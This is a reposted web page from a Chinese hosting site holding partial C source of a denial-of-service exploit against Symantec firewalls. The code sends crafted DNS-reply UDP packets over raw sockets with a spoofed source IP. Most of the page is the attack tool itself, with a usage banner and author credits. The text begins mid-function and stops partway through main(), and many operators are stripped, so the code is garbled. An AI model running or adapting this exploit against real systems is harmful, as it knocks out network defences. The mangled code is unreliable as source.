赛门铁客防火墙D.o.s攻击代码

printf(" -tp:int To (recipient) open UDP port number:/n");
printf(" 137, 138, 445, 500(default)/n");
printf(" -ti:IP To (recipient) IP address/n");
printf(" -n:int Number of times/n");
exit(1);
}

void
ValidateArgs(int argc, char **argv)
{
int i;

iToPort = 500;
iFromPort = DEFAULT_PORT;
dwToIP = inet_addr(DEFAULT_IP);
dwFromIP = inet_addr(DEFAULT_IP);
dwCount = DEFAULT_COUNT;
memcpy(strMessage, dnsreply, sizeof(dnsreply)-1);

for(i = 1; i < argc; i ) {
if ((argv[i][0] == '-')
(argv[i][0] == '/')) {
switch (tolower(argv[i][1])) {
case 'f':
switch (tolower(argv[i][2])) {
case 'i':
if (strlen(argv[i]) > 4)
dwFromIP = inet_addr(&argv[i][4]);
break;
default:
usage(argv[0]);
break;
}
break;
case 't':
switch (tolower(argv[i][2])) {
case 'p':
if (strlen(argv[i]) > 4)
iToPort = atoi(&argv[i][4]);
break;
case 'i':
if (strlen(argv[i]) > 4)
dwToIP = inet_addr(&argv[i][4]);
break;
default:
usage(argv[0]);
break;
}
break;
case 'n':
if (strlen(argv[i]) > 3)
dwCount = atol(&argv[i][3]);
break;
default:
usage(argv[0]);
break;
}
}
}
return;
}


/* This function calculates the 16-bit one's complement sum */
/* for the supplied buffer */
unsigned short
checksum(unsigned short *buffer, int size)
{
unsigned long cksum=0;

while (size > 1) {
cksum = *buffer ;
size -= sizeof(unsigned short);
}
if (size) {
cksum = *(unsigned char *)buffer;
}
cksum = (cksum >> 16) (cksum & 0xffff);
cksum = (cksum >>16);

return (unsigned short)(~cksum);
}




int
main(int argc, char **argv)
{
#ifdef _WIN32
WSADATA wsd;
#endif
int s;
#ifdef _WIN32
BOOL bOpt;
#else
int bOpt;
#endif
struct sockaddr_in remote;
IP_HDR ipHdr;
UDP_HDR udpHdr;
int ret;
unsigned long i;
unsigned short iTotalSize,
iUdpSize,
iUdpChecksumSize,
iIPVersion,
iIPSize,
cksum = 0;
char buf[MAX_PACKET],
*ptr = NULL;
#ifdef _WIN32
IN_ADDR addr;
#else
struct sockaddr_in addr;
#endif

printf("/nSymantec Multiple Firewall DNS Response Denial-of-Service exploit v0.1/n");
printf("Bug discoveried by eEye:/n");
printf("http://www.eeye.com/html/Research/Advisories/AD20040512B.html/n/n");
printf("--- Coded by .::[ houseofdabus ]::. ---/n/n");

if (argc < 3) usage(argv[0]);

/* Parse command line arguments and print them out */
ValidateArgs(argc, argv);
#ifdef _WIN32
addr.S_un.S_addr = dwFromIP;
printf("[*] From IP: <%s>, port: %d/n", inet_ntoa(addr), iFromPort);
addr.S_un.S_addr = dwToIP;
printf("[*] To IP: <%s>, port: %d/n", inet_ntoa(addr), iToPort);
printf("[*] Count: %d/n", dwCount);
#else
addr.sin_addr.s_addr = dwFromIP;
printf("[*] From IP: <%s>, port: %d/n", inet_ntoa(addr.sin_addr), iFromPort);
addr.sin_addr.s_addr = dwToIP;
printf("[*] To IP: <%s>, port: %d/n", inet_ntoa(addr.sin_addr), iToPort);
printf("[*] Count: %d/n", dwCount);
#endif

#ifdef _WIN32
if (WSAStartup(MAKEWORD(2,2), &wsd) != 0) {
printf("[-] WSAStartup() failed: %d/n", GetLastError());
return -1;
}
#endif
/* Creating a raw socket */
s = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
#ifdef _WIN32
if (s == INVALID_SOCKET) {
printf("[-] WSASocket() failed: %d/n", WSAGetLastError());
return -1;
}
#endif

/* Enable the IP header include option */
#ifdef _WIN32
bOpt = TRUE;
#else
bOpt = 1;
#endif
ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt, sizeof(bOpt));
#ifdef _WIN32
if (ret == SOCKET_ERROR) {
printf("[-] setsockopt(IP_HDRINCL) failed: %d/n", WSAGetLastError());
return -1;
}
#endif
/* Initalize the IP header */
iTotalSize = sizeof(ipHdr) sizeof(udpHdr) sizeof(dnsreply)-1;

iIPVersion = 4;
iIPSize = sizeof(ipHdr) / sizeof(unsigned long);

ipHdr.ip_verlen = (iIPVersion << 4) | iIPSize;
ipHdr.ip_tos = 0; /* IP type of service */
ipHdr.ip_totallength = htons(iTotalSize); /* Total packet len */
ipHdr.ip_id = 0; /* Unique identifier: set to 0 */
ipHdr.ip_offset = 0; /* Fragment offset field */
ipHdr.ip_ttl = 128; /* Time to live */
ipHdr.ip_protocol = 0x11; /* Protocol(UDP) */
ipHdr.ip_checksum = 0 ; /* IP checksum */
ipHdr.ip_srcaddr = dwFromIP; /* Source address */
ipHdr.ip_destaddr = dwToIP; /* Destination address */

/* Initalize the UDP header */
iUdpSize = sizeof(udpHdr) sizeof(dnsreply)-1;

udpHdr.src_portno = htons(iFromPort) ;
udpHdr.dst_portno = htons(iToPort) ;
udpHdr.udp_length = htons(iUdpSize) ;
udpHdr.udp_checksum = 0 ;


iUdpChecksumSize = 0;
ptr = buf;
memset(buf, 0, MAX_PACKET);

文章整理：西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!